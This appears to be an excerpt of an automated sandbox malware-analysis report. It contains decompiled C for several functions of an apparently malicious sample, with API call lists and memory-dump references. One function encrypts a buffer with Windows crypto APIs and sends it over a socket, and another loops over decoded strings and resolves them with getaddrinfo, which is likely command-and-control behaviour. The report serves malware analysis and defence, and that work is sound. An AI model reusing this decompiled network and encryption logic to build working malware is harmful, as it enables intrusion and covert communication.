    0x003c55fd
    0x003c55fd
    0x003c5602
    0x003c5605
    0x003c5605
    0x003c560b
    0x003c5610
    0x003c5613
    0x003c5613
    0x003c5619
    0x003c561e
    0x003c5626
    0x003c5626
    0x003c5628
    0x003c562f
    0x003c5630
    0x003c5638
    0x003c5638
    0x003c563d
    0x003c5648

    APIs
      • Part of subcall function 003C5230: SysFreeString.OLEAUT32(00000000), ref: 003C5247
      • Part of subcall function 003C5230: SysFreeString.OLEAUT32(00000001), ref: 003C5255
    • SysFreeString.OLEAUT32(?), ref: 003C549E
    • SysFreeString.OLEAUT32(?), ref: 003C54AF
      • Part of subcall function 003CB1E0: SysFreeString.OLEAUT32(?), ref: 003CB1F8
      • Part of subcall function 003CB1E0: SysFreeString.OLEAUT32(?), ref: 003CB201
    • _wtoi.MSVCRT ref: 003C55BB
    • SysFreeString.OLEAUT32(?), ref: 003C5605
    • SysFreeString.OLEAUT32(?), ref: 003C5613
      • Part of subcall function 003D1D90: LoadLibraryA.KERNEL32(?), ref: 003D1DB7
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1DD8
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1DFE
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1E1C
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1E3A
      • Part of subcall function 003D1D90: GetProcessHeap.KERNEL32 ref: 003D1E45
      • Part of subcall function 003D1D90: RtlReAllocateHeap.NTDLL(00160000,00000008,?,003D042E), ref: 003D1E5F
      • Part of subcall function 003D1D90: RtlAllocateHeap.NTDLL(00160000,00000008,003D042E), ref: 003D1E72
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003C9D50, Relevance: 7.7, APIs: 5, Instructions: 191
    C-Code - Quality: 64%
    			E003C9D50(intOrPtr __ecx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v228;
				intOrPtr* _t59;
				intOrPtr* _t61;
				intOrPtr* _t62;
				intOrPtr* _t63;
				intOrPtr* _t64;
				intOrPtr* _t65;
				intOrPtr* _t69;
				intOrPtr* _t74;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr* _t78;
				intOrPtr* _t79;
				intOrPtr* _t80;
				intOrPtr* _t82;
				intOrPtr* _t83;
				intOrPtr* _t91;
				intOrPtr* _t92;
				intOrPtr* _t95;
				intOrPtr* _t99;
				intOrPtr _t100;
				intOrPtr _t102;
				intOrPtr _t109;
				intOrPtr _t114;
				intOrPtr _t116;
				intOrPtr* _t130;
				intOrPtr* _t138;
				void* _t139;
				void* _t140;
				void* _t141;

				_t102 = __ecx;
				_v20 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v16 = 0;
				_v28 = 0;
				E003CD6A0(__ecx);
				_t59 =  *((intOrPtr*)(__ecx + 4));
				if(_t59 != 0) {
					_t61 =  *((intOrPtr*)( *((intOrPtr*)( *_t59 + 0xb4))))(_t59,  &_v20);
					__eflags = _t61;
					if(_t61 >= 0) {
						_t69 = _v20;
						__eflags =  *((intOrPtr*)( *((intOrPtr*)( *_t69 + 0xa4))))(_t69,  &_v12);
						if(__eflags >= 0) {
							E003C9090(__eflags,  &_v228, 0x45);
							_t109 =  *0x3e8628; // 0x622508
							_t140 = _t139 + 8;
							_t74 =  *((intOrPtr*)( *((intOrPtr*)(_t109 + 0xe0))))(_v12,  &_v228);
							__eflags = _t74;
							if(_t74 == 0) {
								_t75 = _v20;
								_t77 =  *((intOrPtr*)( *((intOrPtr*)( *_t75 + 0x34))))(_t75,  &_v8);
								__eflags = _t77;
								if(_t77 >= 0) {
									__eflags = _t77 - 1;
									if(_t77 == 1) {
										L20:
										_v28 = 1;
									} else {
										while(1) {
											_t78 = _v12;
											__eflags = _t78;
											if(_t78 != 0) {
												__imp__#6(_t78);
											}
											_t79 = _v16;
											_v12 = 0;
											__eflags = _t79;
											if(_t79 != 0) {
												__imp__#6(_t79);
											}
											_t80 = _v8;
											_v16 = 0;
											_t82 =  *((intOrPtr*)( *((intOrPtr*)( *_t80 + 0xa4))))(_t80,  &_v12);
											__eflags = _t82;
											if(_t82 < 0) {
												goto L21;
											}
											_t83 = _v8;
											__eflags =  *((intOrPtr*)( *((intOrPtr*)( *_t83 + 0x68))))(_t83,  &_v16);
											if(__eflags >= 0) {
												E003C9090(__eflags,  &_v228, 0x46);
												_t114 =  *0x3e8628; // 0x622508
												_t141 = _t140 + 8;
												_t130 =  *((intOrPtr*)(_t114 + 0xe0));
												__eflags =  *_t130(_v12,  &_v228);
												if(__eflags != 0) {
													E003C9090(__eflags,  &_v228, 0x47);
													_t116 =  *0x3e8628; // 0x622508
													_t140 = _t141 + 8;
													_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t116 + 0xe0))))(_v12,  &_v228);
													__eflags = _t91;
													if(_t91 != 0) {
														goto L18;
													} else {
														_t99 = E003CBF60(_t102, _v8);
														__eflags = _t99;
														if(_t99 != 0) {
															goto L18;
														}
													}
												} else {
													_t100 = _v16;
													__imp___wtoi(_t100);
													asm("cdq");
													_t140 = _t141 + 4;
													 *((intOrPtr*)(_t102 + 0x10)) = _t100;
													 *((intOrPtr*)(_t102 + 0x14)) = _t130;
													L18:
													_t92 = _v8;
													_t138 =  *((intOrPtr*)( *((intOrPtr*)( *_t92 + 0x40))))(_t92,  &_v24);
													__eflags = _t138;
													if(_t138 >= 0) {
														_t95 = _v8;
														 *((intOrPtr*)( *((intOrPtr*)( *_t95 + 8))))(_t95);
														_v8 = _v24;
														_v24 = 0;
														__eflags = _t138 - 1;
														if(_t138 != 1) {
															continue;
														} else {
															goto L20;
														}
													}
												}
											}
											goto L21;
										}
									}
									L21:
								}
							}
						}
					}
					_t62 = _v16;
					__eflags = _t62;
					if(_t62 != 0) {
						__imp__#6(_t62);
					}
					_t63 = _v12;
					__eflags = _t63;
					if(_t63 != 0) {
						__imp__#6(_t63);
					}
					_t64 = _v8;
					__eflags = _t64;
					if(_t64 != 0) {
						 *((intOrPtr*)( *((intOrPtr*)( *_t64 + 8))))(_t64);
					}
					_t65 = _v20;
					__eflags = _t65;
					if(_t65 != 0) {
						 *((intOrPtr*)( *((intOrPtr*)( *_t65 + 8))))(_t65);
					}
					return _v28;
				} else {
					return 0;
				}
			}







































    0x003c9d5d
    0x003c9d5f
    0x003c9d62
    0x003c9d65
    0x003c9d68
    0x003c9d6b
    0x003c9d6e
    0x003c9d71
    0x003c9d76
    0x003c9d7b
    0x003c9d92
    0x003c9d94
    0x003c9d96
    0x003c9d9c
    0x003c9dae
    0x003c9db0
    0x003c9dbf
    0x003c9dc7
    0x003c9dcd
    0x003c9dde
    0x003c9de0
    0x003c9de2
    0x003c9de8
    0x003c9df5
    0x003c9df7
    0x003c9df9
    0x003c9e00
    0x003c9e03
    0x003c9f16
    0x003c9f16
    0x00000000
    0x003c9e10
    0x003c9e10
    0x003c9e13
    0x003c9e15
    0x003c9e18
    0x003c9e18
    0x003c9e1e
    0x003c9e21
    0x003c9e24
    0x003c9e26
    0x003c9e29
    0x003c9e29
    0x003c9e2f
    0x003c9e35
    0x003c9e42
    0x003c9e44
    0x003c9e46
    0x00000000
    0x00000000
    0x003c9e4c
    0x003c9e5b
    0x003c9e5d
    0x003c9e6c
    0x003c9e74
    0x003c9e7a
    0x003c9e84
    0x003c9e8d
    0x003c9e8f
    0x003c9eb0
    0x003c9eb8
    0x003c9ebe
    0x003c9ecf
    0x003c9ed1
    0x003c9ed3
    0x00000000
    0x003c9ed5
    0x003c9edb
    0x003c9ee0
    0x003c9ee2
    0x00000000
    0x00000000
    0x003c9ee2
    0x003c9e91
    0x003c9e91
    0x003c9e95
    0x003c9e9b
    0x003c9e9c
    0x003c9e9f
    0x003c9ea2
    0x003c9ee4
    0x003c9ee4
    0x003c9ef3
    0x003c9ef5
    0x003c9ef7
    0x003c9ef9
    0x003c9f02
    0x003c9f07
    0x003c9f0a
    0x003c9f0d
    0x003c9f10
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x003c9f10
    0x003c9ef7
    0x003c9e8f
    0x00000000
    0x003c9e5d
    0x003c9e10
    0x003c9f1d
    0x003c9f1d
    0x003c9df9
    0x003c9de2
    0x003c9db0
    0x003c9f1e
    0x003c9f21
    0x003c9f23
    0x003c9f26
    0x003c9f26
    0x003c9f2c
    0x003c9f2f
    0x003c9f31
    0x003c9f34
    0x003c9f34
    0x003c9f3a
    0x003c9f3d
    0x003c9f3f
    0x003c9f47
    0x003c9f47
    0x003c9f49
    0x003c9f4c
    0x003c9f4e
    0x003c9f56
    0x003c9f56
    0x003c9f60
    0x003c9d7e
    0x003c9d84
    0x003c9d84

    APIs
    • SysFreeString.OLEAUT32(?), ref: 003C9E18
    • SysFreeString.OLEAUT32(?), ref: 003C9E29
    • _wtoi.MSVCRT ref: 003C9E95
      • Part of subcall function 003CBF60: SysFreeString.OLEAUT32(?), ref: 003CC049
      • Part of subcall function 003CBF60: SysFreeString.OLEAUT32(?), ref: 003CC05E
      • Part of subcall function 003CBF60: _wtoi.MSVCRT ref: 003CC115
      • Part of subcall function 003CBF60: rand.MSVCRT ref: 003CC160
      • Part of subcall function 003CBF60: SysFreeString.OLEAUT32(?), ref: 003CC2AE
      • Part of subcall function 003CBF60: SysFreeString.OLEAUT32(?), ref: 003CC2BC
    • SysFreeString.OLEAUT32(?), ref: 003C9F26
    • SysFreeString.OLEAUT32(?), ref: 003C9F34
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003C28E0, Relevance: 7.7, APIs: 5, Instructions: 170
    C-Code - Quality: 65%
    			E003C28E0(intOrPtr __ecx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				char _v24;
				char _v28;
				intOrPtr _v32;
				char _v232;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr* _t57;
				intOrPtr* _t58;
				intOrPtr* _t59;
				intOrPtr* _t60;
				intOrPtr* _t66;
				intOrPtr* _t71;
				intOrPtr* _t72;
				intOrPtr* _t74;
				intOrPtr* _t75;
				intOrPtr* _t76;
				intOrPtr* _t77;
				intOrPtr* _t79;
				intOrPtr* _t80;
				intOrPtr* _t85;
				intOrPtr* _t86;
				intOrPtr* _t89;
				intOrPtr _t92;
				void* _t96;
				intOrPtr* _t97;
				intOrPtr _t105;
				intOrPtr _t110;
				intOrPtr _t127;
				intOrPtr* _t128;
				void* _t129;
				void* _t130;

				_t127 = __ecx;
				_t54 =  *((intOrPtr*)(__ecx + 4));
				_v32 = __ecx;
				_v20 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v16 = 0;
				_v28 = 0;
				if(_t54 != 0) {
					_t56 =  *((intOrPtr*)( *((intOrPtr*)( *_t54 + 0xb4))))(_t54,  &_v20, _t96);
					_t97 = __imp__#6;
					__eflags = _t56;
					if(_t56 >= 0) {
						_t66 = _v20;
						__eflags =  *((intOrPtr*)( *((intOrPtr*)( *_t66 + 0xa4))))(_t66,  &_v12);
						if(__eflags >= 0) {
							E003C9090(__eflags,  &_v232, 0xa3);
							_t105 =  *0x3e8628; // 0x622508
							_t130 = _t129 + 8;
							_t71 =  *((intOrPtr*)( *((intOrPtr*)(_t105 + 0xe0))))(_v12,  &_v232);
							__eflags = _t71;
							if(_t71 == 0) {
								_t72 = _v20;
								_t74 =  *((intOrPtr*)( *((intOrPtr*)( *_t72 + 0x34))))(_t72,  &_v8);
								__eflags = _t74;
								if(_t74 >= 0) {
									__eflags = _t74 - 1;
									if(_t74 == 1) {
										L19:
										_v28 = 1;
									} else {
										while(1) {
											_t75 = _v12;
											__eflags = _t75;
											if(_t75 != 0) {
												 *_t97(_t75);
											}
											_t76 = _v16;
											__eflags = _t76;
											if(_t76 != 0) {
												 *_t97(_t76);
											}
											_t77 = _v8;
											_v12 = 0;
											_v16 = 0;
											_t79 =  *((intOrPtr*)( *((intOrPtr*)( *_t77 + 0xa4))))(_t77,  &_v12);
											__eflags = _t79;
											if(_t79 < 0) {
												goto L20;
											}
											_t80 = _v8;
											__eflags =  *((intOrPtr*)( *((intOrPtr*)( *_t80 + 0x68))))(_t80,  &_v16);
											if(__eflags >= 0) {
												E003C9090(__eflags,  &_v232, 0xa4);
												_t110 =  *0x3e8628; // 0x622508
												_t130 = _t130 + 8;
												_t85 =  *((intOrPtr*)( *((intOrPtr*)(_t110 + 0xe0))))(_v12,  &_v232);
												__eflags = _t85;
												if(_t85 == 0) {
													_t92 = _v16;
													__imp___wtoi(_t92);
													_t130 = _t130 + 4;
													 *((intOrPtr*)(_t127 + 0x10)) = _t92;
												}
												_t86 = _v8;
												_t128 =  *((intOrPtr*)( *((intOrPtr*)( *_t86 + 0x40))))(_t86,  &_v24);
												__eflags = _t128;
												if(_t128 >= 0) {
													_t89 = _v8;
													 *((intOrPtr*)( *((intOrPtr*)( *_t89 + 8))))(_t89);
													_v8 = _v24;
													_v24 = 0;
													__eflags = _t128 - 1;
													if(_t128 != 1) {
														_t127 = _v32;
														continue;
													} else {
														goto L19;
													}
												}
											}
											goto L20;
										}
									}
								}
							}
						}
					}
					L20:
					_t57 = _v16;
					__eflags = _t57;
					if(_t57 != 0) {
						 *_t97(_t57);
					}
					_t58 = _v12;
					__eflags = _t58;
					if(_t58 != 0) {
						 *_t97(_t58);
					}
					_t59 = _v8;
					__eflags = _t59;
					if(_t59 != 0) {
						 *((intOrPtr*)( *((intOrPtr*)( *_t59 + 8))))(_t59);
					}
					_t60 = _v20;
					__eflags = _t60;
					if(_t60 != 0) {
						 *((intOrPtr*)( *((intOrPtr*)( *_t60 + 8))))(_t60);
					}
					return _v28;
				} else {
					return 0;
				}
			}






































    0x003c28ea
    0x003c28ec
    0x003c28f2
    0x003c28f5
    0x003c28f8
    0x003c28fb
    0x003c28fe
    0x003c2901
    0x003c2904
    0x003c2909
    0x003c2921
    0x003c2923
    0x003c2929
    0x003c292b
    0x003c2931
    0x003c2943
    0x003c2945
    0x003c2957
    0x003c295f
    0x003c2965
    0x003c2976
    0x003c2978
    0x003c297a
    0x003c2980
    0x003c298d
    0x003c298f
    0x003c2991
    0x003c2997
    0x003c299a
    0x003c2a5f
    0x003c2a5f
    0x003c29a0
    0x003c29a5
    0x003c29a5
    0x003c29a8
    0x003c29aa
    0x003c29ad
    0x003c29ad
    0x003c29af
    0x003c29b2
    0x003c29b4
    0x003c29b7
    0x003c29b7
    0x003c29b9
    0x003c29bf
    0x003c29c2
    0x003c29cf
    0x003c29d1
    0x003c29d3
    0x00000000
    0x00000000
    0x003c29d9
    0x003c29e8
    0x003c29ea
    0x003c29f8
    0x003c2a00
    0x003c2a06
    0x003c2a17
    0x003c2a19
    0x003c2a1b
    0x003c2a1d
    0x003c2a21
    0x003c2a27
    0x003c2a2a
    0x003c2a2a
    0x003c2a2d
    0x003c2a3c
    0x003c2a3e
    0x003c2a40
    0x003c2a42
    0x003c2a4b
    0x003c2a50
    0x003c2a53
    0x003c2a56
    0x003c2a59
    0x003c29a2
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x003c2a59
    0x003c2a40
    0x00000000
    0x003c29ea
    0x003c29a5
    0x003c299a
    0x003c2991
    0x003c297a
    0x003c2945
    0x003c2a66
    0x003c2a66
    0x003c2a69
    0x003c2a6b
    0x003c2a6e
    0x003c2a6e
    0x003c2a70
    0x003c2a73
    0x003c2a75
    0x003c2a78
    0x003c2a78
    0x003c2a7a
    0x003c2a7e
    0x003c2a80
    0x003c2a88
    0x003c2a88
    0x003c2a8a
    0x003c2a8d
    0x003c2a8f
    0x003c2a97
    0x003c2a97
    0x003c2aa1
    0x003c290c
    0x003c2912
    0x003c2912

    APIs
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003D43AE, Relevance: 7.7, APIs: 5, Instructions: 162network
    C-Code - Quality: 26%
    			E003D43AE(intOrPtr* _a4, void* _a8, void* _a12) {
				void* _v8;
				void* _v12;
				void _v32;
				void _v148;
				signed int _t44;
				void* _t53;
				void* _t63;
				signed int _t64;
				signed short _t77;
				int _t79;
				signed int _t80;
				signed int* _t88;
				signed int _t93;
				void* _t95;
				intOrPtr* _t102;
				void* _t103;
				void* _t108;
				void* _t109;
				void* _t110;

				_t95 =  *0x3e8538(0x200);
				_v12 = _t95;
				_v8 =  *0x3e8538(0x200);
				memset(_t95, 0, 0x1fd);
				 *_t95 = 5;
				if(_a12 == 0) {
					_t44 = 0;
				} else {
					_t77 =  *(_a4 + 0x138) & 0x0000ffff;
					__imp__#9(_t77);
					_t44 = _t77 & 0x0000ffff;
				}
				_t108 = _a8;
				_push(0x1fd);
				 *(_t95 + 3) = _t44;
				_push(_t95);
				if(_t108 == 0) {
					_t108 = _a4 + 8;
				}
				 *0x3e899c(_t108);
				_t80 = 0x1d;
				memcpy( &_v148, _t108, _t80 << 2);
				_t109 =  *0x3e8538(0x14);
				_a12 = _t109;
				 *0x3e8ab0( &_v148, _t109);
				memcpy( &_v32, _t109, 0 << 2);
				 *0x3e8540(_a12, 5);
				_t110 = _v12;
				 *((intOrPtr*)(_t110 + 5)) = _v32;
				_t53 = _a8;
				if(_t53 == 0) {
					memset(_v8, 0, 0x200);
					_t102 = _a4;
					_t32 = _t102 + 0x120; // 0x120
					_t33 = _t102 + 0x110; // 0x110
					_t35 = _t102 + 0xf0; // 0xf0
					if(E003D3BB7(_t35, _t110, 0x1fd, _v8 + 3, _t33, _t32) == 0) {
						goto L12;
					} else {
						_t79 = 0x200;
						goto L11;
					}
				} else {
					_t103 = _v8;
					_t22 = _t53 + 0x118; // 0x118
					_t23 = _t53 + 0x108; // 0x108
					if(E003D3BB7(_t53 + 0xe8, _t110, 0x1fd, _t103, _t23, _t22) == 0) {
						L13:
						 *0x3e8540(_t110);
						 *0x3e8540(_t103);
						_t63 = 0;
					} else {
						_t71 = _a4;
						_t25 = _t71 + 0x120; // 0x120
						_t26 = _t71 + 0x110; // 0x110
						if(E003D3BB7(_a4 + 0xf0, _t103, 0x1fd, _t110, _t26, _t25) == 0) {
							goto L13;
						} else {
							_t79 = 0x200;
							memset(_t103, 0, 0x200);
							_t93 = 0x7f;
							memcpy(_t103 + 3, _t110, _t93 << 2);
							asm("movsb");
							_t102 = _a4;
							_t110 = _v12;
							L11:
							_t64 =  *(_t102 + 4) & 0x0000ffff;
							__imp__#9(_t64);
							_t88 = _v8;
							 *_t88 = _t64;
							_t88[0] = 3;
							if(E003DFD0B( *_t102, _t88, _t79) == _t79) {
								 *0x3e8540(_t110);
								 *0x3e8540(_v8);
								_t63 = 1;
							} else {
								L12:
								_t103 = _v8;
								goto L13;
							}
						}
					}
				}
				return _t63;
			}






















    0x003d43c6
    0x003d43c9
    0x003d43d9
    0x003d43dc
    0x003d43e8
    0x003d43eb
    0x003d4403
    0x003d43ed
    0x003d43f0
    0x003d43f8
    0x003d43fe
    0x003d43fe
    0x003d4405
    0x003d4408
    0x003d4409
    0x003d440d
    0x003d4410
    0x003d4415
    0x003d4415
    0x003d4419
    0x003d4421
    0x003d442a
    0x003d4432
    0x003d443d
    0x003d4440
    0x003d444f
    0x003d4451
    0x003d445a
    0x003d445d
    0x003d4460
    0x003d4466
    0x003d44e8
    0x003d44ed
    0x003d44f0
    0x003d44f7
    0x003d4506
    0x003d4518
    0x00000000
    0x003d451a
    0x003d451a
    0x00000000
    0x003d451a
    0x003d4468
    0x003d4468
    0x003d446b
    0x003d4472
    0x003d448c
    0x003d4547
    0x003d4548
    0x003d454f
    0x003d4555
    0x003d4492
    0x003d4492
    0x003d4495
    0x003d449c
    0x003d44b6
    0x00000000
    0x003d44bc
    0x003d44bc
    0x003d44c5
    0x003d44d2
    0x003d44d3
    0x003d44d5
    0x003d44d6
    0x003d44d9
    0x003d451f
    0x003d451f
    0x003d4524
    0x003d452a
    0x003d452f
    0x003d4532
    0x003d4542
    0x003d455a
    0x003d4563
    0x003d456b
    0x003d4544
    0x003d4544
    0x003d4544
    0x00000000
    0x003d4544
    0x003d4542
    0x003d44b6
    0x003d448c
    0x003d4572

    APIs
    • memset.MSVCRT ref: 003D43DC
    • htons.WS2_32(?), ref: 003D43F8
    • memset.MSVCRT ref: 003D44C5
    • memset.MSVCRT ref: 003D44E8
      • Part of subcall function 003D3BB7: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,?,000001FD,?,?,?,?,00000000,00000200), ref: 003D3BCF
      • Part of subcall function 003D3BB7: CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,?,?,00000020), ref: 003D3C60
      • Part of subcall function 003D3BB7: CryptDestroyKey.ADVAPI32(?), ref: 003D3C71
      • Part of subcall function 003D3BB7: CryptImportKey.ADVAPI32(?,00000000,0000001C,00000000,00000000,?), ref: 003D3D87
      • Part of subcall function 003D3BB7: CryptReleaseContext.ADVAPI32(?,00000000), ref: 003D3DD2
      • Part of subcall function 003D3BB7: CryptDestroyKey.ADVAPI32(?), ref: 003D3DF2
      • Part of subcall function 003D3BB7: CryptReleaseContext.ADVAPI32(?,00000000), ref: 003D3DFD
    • htons.WS2_32(?), ref: 003D4524
      • Part of subcall function 003DFD0B: htons.WS2_32(?), ref: 003DFDE5
      • Part of subcall function 003DFD0B: memcpy.MSVCRT ref: 003DFDF7
      • Part of subcall function 003DFD0B: memcpy.MSVCRT ref: 003DFE15
      • Part of subcall function 003DFD0B: memset.MSVCRT ref: 003DFE5E
      • Part of subcall function 003DFD0B: htons.WS2_32(00000301), ref: 003DFEB9
      • Part of subcall function 003DFD0B: htons.WS2_32(?), ref: 003DFEC2
      • Part of subcall function 003DFD0B: send.WS2_32(?,?,?,00000000), ref: 003DFED4
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003C99A0, Relevance: 7.6, APIs: 5, Instructions: 143network
    C-Code - Quality: 48%
    			E003C99A0(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v8;
				char _v12;
				void* _v16;
				void* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v52;
				char _v252;
				char _v452;
				char _v852;
				char* _t43;
				char _t44;
				intOrPtr _t50;
				char _t51;
				void* _t56;
				void* _t57;
				char* _t59;
				intOrPtr _t62;
				void* _t64;
				void* _t85;
				void* _t86;

				_t43 =  &_v852;
				_v20 = 0;
				_t64 = 0;
				_v12 = 0;
				_v8 = 0;
				_v16 = 0;
				__imp__#115(0x202, _t43, __edi, __esi, __ebx);
				if(_t43 != 0) {
					L17:
					_t44 = _v8;
				} else {
					_t64 = E003D1D90(0x100, 0);
					_t86 = _t86 + 8;
					if(_t64 != 0) {
						_t50 = E003C8730(_a4);
						_v20 = _t50;
						if(_t50 != 0) {
							_t51 = _v8;
							_t85 = 0;
							while(1) {
								_t69 = _v12;
								if(_v12 != 0) {
									E003CBB40(_t69);
									_t51 = _v8;
									_t86 = _t86 + 4;
								}
								_v12 = 0;
								_t92 = _t51;
								if(_t51 != 0) {
									__imp__freeaddrinfo(_t51);
								}
								_v8 = 0;
								E003C9090(_t92,  &_v452, 0x22);
								_t14 = _t85 + 0x3e32f0; // 0xb6
								E003C9090(_t92,  &_v252,  *_t14);
								_push( &_v252);
								_t56 = E003D0C10(_t64, 0x80,  &_v452, _v20);
								_t86 = _t86 + 0x24;
								if(_t56 < 0) {
									goto L17;
								}
								_t57 = E003C7E20(_t64, 0,  &_v12, 0xffffffff);
								_t86 = _t86 + 0x10;
								if(_t57 == 0) {
									goto L17;
								} else {
									_v48 = 0;
									_v44 = 0;
									_v52 = 0;
									_v40 = 0;
									_v36 = 0;
									_v32 = 0;
									_v28 = 0;
									_v24 = 0;
									_t59 =  &_v8;
									_v44 = 1;
									_v48 = 2;
									__imp__getaddrinfo(_v12, 0,  &_v52, _t59);
									if(_t59 != 0) {
										L14:
										_t51 = _v8;
										goto L15;
									} else {
										_t51 = _v8;
										if(_t51 != 0) {
											_t37 = _t85 + 0x3e802c; // 0x3caa10
											_t62 =  *((intOrPtr*)( *_t37))( *((intOrPtr*)( *((intOrPtr*)(_t51 + 0x18)) + 4)));
											_t86 = _t86 + 4;
											_v16 = _t62;
											__eflags = _t62;
											if(__eflags != 0) {
												goto L17;
											} else {
												goto L14;
											}
										} else {
											_v16 = 0;
											L15:
											_t85 = _t85 + 4;
											if(_t85 < 0x14) {
												continue;
											} else {
											}
										}
									}
								}
								goto L18;
							}
						}
					}
					goto L17;
				}
				L18:
				if(_t44 != 0) {
					__imp__freeaddrinfo(_t44);
				}
				if(_t64 != 0) {
					E003CBB40(_t64);
					_t86 = _t86 + 4;
				}
				_t45 = _v20;
				if(_v20 != 0) {
					E003CBB40(_t45);
				}
				__imp__#116();
				return _v16;
			}





























    0x003c99ac
    0x003c99bc
    0x003c99bf
    0x003c99c1
    0x003c99c4
    0x003c99c7
    0x003c99ca
    0x003c99d2
    0x003c9b06
    0x003c9b06
    0x003c99d8
    0x003c99e3
    0x003c99e5
    0x003c99ea
    0x003c99f6
    0x003c99fb
    0x003c9a00
    0x003c9a06
    0x003c9a09
    0x003c9a10
    0x003c9a10
    0x003c9a15
    0x003c9a18
    0x003c9a1d
    0x003c9a20
    0x003c9a20
    0x003c9a23
    0x003c9a26
    0x003c9a28
    0x003c9a2b
    0x003c9a2b
    0x003c9a3a
    0x003c9a3d
    0x003c9a42
    0x003c9a50
    0x003c9a5e
    0x003c9a6d
    0x003c9a72
    0x003c9a77
    0x00000000
    0x00000000
    0x003c9a85
    0x003c9a8a
    0x003c9a8f
    0x00000000
    0x003c9a91
    0x003c9a96
    0x003c9a99
    0x003c9a9c
    0x003c9a9f
    0x003c9aa2
    0x003c9aa5
    0x003c9aa8
    0x003c9aab
    0x003c9aae
    0x003c9ab8
    0x003c9abf
    0x003c9ac6
    0x003c9ace
    0x003c9af5
    0x003c9af5
    0x00000000
    0x003c9ad0
    0x003c9ad0
    0x003c9ad5
    0x003c9ae2
    0x003c9ae9
    0x003c9aeb
    0x003c9aee
    0x003c9af1
    0x003c9af3
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x003c9ad7
    0x003c9ad7
    0x003c9af8
    0x003c9af8
    0x003c9afe
    0x00000000
    0x00000000
    0x003c9b04
    0x003c9afe
    0x003c9ad5
    0x003c9ace
    0x00000000
    0x003c9a8f
    0x003c9a10
    0x003c9a00
    0x00000000
    0x003c99ea
    0x003c9b09
    0x003c9b0b
    0x003c9b0e
    0x003c9b0e
    0x003c9b16
    0x003c9b19
    0x003c9b1e
    0x003c9b1e
    0x003c9b21
    0x003c9b29
    0x003c9b2c
    0x003c9b31
    0x003c9b34
    0x003c9b40

    APIs
    • WSAStartup.WS2_32(00000202,?), ref: 003C99CA
    • freeaddrinfo.WS2_32(?), ref: 003C9A2B
      • Part of subcall function 003D0C10: _vsnwprintf.MSVCRT ref: 003D0C42
    • getaddrinfo.WS2_32(?,00000000,?,?), ref: 003C9AC6
    • freeaddrinfo.WS2_32(?), ref: 003C9B0E
    • WSACleanup.WS2_32 ref: 003C9B34
      • Part of subcall function 003CBB40: HeapFree.KERNEL32(00160000,00000008,003D04E6), ref: 003CBB53
      • Part of subcall function 003D1D90: LoadLibraryA.KERNEL32(?), ref: 003D1DB7
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1DD8
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1DFE
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1E1C
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1E3A
      • Part of subcall function 003D1D90: GetProcessHeap.KERNEL32 ref: 003D1E45
